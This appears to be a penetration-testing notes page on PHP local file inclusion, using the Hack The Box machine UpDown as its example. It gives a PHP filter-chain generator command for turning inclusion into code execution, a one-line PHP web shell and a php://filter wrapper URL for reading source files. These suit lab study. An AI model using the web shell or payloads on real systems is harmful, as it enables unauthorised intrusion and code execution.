Source Code

LFI

UpDown HTB

  • Direct Access set to false

  • Get the page

  • If the page doesn't have /bin, usr, home, var, etc

  • Then it does an include on the page variable and appends .php (on any file)

  • Else, it includes checker.php

RCE via PHP filters

It's possible to get command execution just through $_GET['page']

LogoLFI2RCE via PHP FiltersHackTricks
python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"

Take the output and append it to /?page=

If system isn't a disabled function this can be used

<?php system($_GET["cmd"]); ?>
LogoGitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHub

Reading Local Files

We can pull the index.php file encoded in base64 using this wrapper in the GET request

/?page=php://filter/convert.base64-encode/resource=index

Good example:

LogoFoothold | Hack The Box

Authentication Bypass via strcmp in PHP

PreviousPHP ApplicationsNextBrute Forcing and Spraying

Last updated